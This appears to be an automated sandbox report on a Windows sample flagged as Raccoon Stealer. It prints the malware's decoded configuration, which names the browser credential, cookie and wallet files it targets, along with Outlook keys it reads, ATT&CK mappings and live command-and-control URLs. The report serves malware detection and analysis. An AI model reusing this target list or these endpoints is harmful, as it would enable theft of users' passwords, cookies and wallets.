Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection11	Obfuscated Files or Information3	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing22	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	System Information Discovery36	Distributed Component Object Model	Email Collection1	Scheduled Transfer	Application Layer Protocol115	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Security Software Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Virtualization/Sandbox Evasion1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection11	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	34%	Virustotal		Browse
SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	38%	ReversingLabs	Win32.Trojan.DllCheck
SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	3%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.1.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139893		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://crl.securetrust.com/SGCA.crl0	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://185.138.164.150/;r	0%	Avira URL Cloud	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
https://ocsp.quovadisoffshore.com0	0%	URL Reputation	safe
http://185.138.164.150//l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67	0%	Avira URL Cloud	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://ocsp.accv.es0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://185.138.164.150/	0%	Virustotal		Browse
http://185.138.164.150/	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel05	0%	URL Reputation	safe
http://www.quovadis.bm0	0%	URL Reputation	safe
http://185.138.164.150//l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1	0%	Avira URL Cloud	safe
http://www.accv.es00	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy-G20	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.138.164.150//l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67	true	Avira URL Cloud: safe	unknown
http://185.138.164.150/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/agrybirdsgamerept	false		high
http://185.138.164.150//l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
http://crl.chambersign.org/chambersroot.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0:	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	false		high
https://repository.luxtrust.lu0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://support.google.com/chrome/answer/6258784	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp	false		high
http://cps.chambersign.org/cps/chambersroot.html0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://telegram.org/img/t_logo.png	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp	false		high
http://www.mozilla.com0	softokn3.dll.1.dr	false	URL Reputation: safe	unknown
http://www.chambersign.org1	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.firmaprofesional.com/cps0	nssckbi.dll.1.dr	false		high
http://www.diginotar.nl/cps/pkioverheid0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://repository.swisssign.com/0	nssckbi.dll.1.dr	false		high
http://crl.securetrust.com/SGCA.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://crl.securetrust.com/STCA.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://185.138.164.150/;r	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323065453.0000000002DB2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	softokn3.dll.1.dr	false		high
http://www.certplus.com/CRL/class2.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.quovadisglobal.com/cps0	nssckbi.dll.1.dr	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	nssckbi.dll.1.dr	false		high
https://ocsp.quovadisoffshore.com0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0de	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	false		high
http://cps.chambersign.org/cps/chambersignroot.html0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	sqlite3.dll.1.dr	false		high
http://policy.camerfirma.com0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
http://www.accv.es/legislacion_c.htm0U	nssckbi.dll.1.dr	false		high
http://www.certicamara.com/dpc/0Z	nssckbi.dll.1.dr	false		high
http://ocsp.accv.es0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	softokn3.dll.1.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
https://ac.ecosia.org/autocomplete?q=	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
https://www.catcert.net/verarrel	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0th	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	nssckbi.dll.1.dr	false		high
http://crl.chambersign.org/chambersignroot.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
https://www.catcert.net/verarrel05	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.quovadis.bm0	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.accv.es00	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.pkioverheid.nl/policies/root-policy-G20	nssckbi.dll.1.dr	false	URL Reputation: safe	unknown
http://www.cert.fnmt.es/dpcs/0	nssckbi.dll.1.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

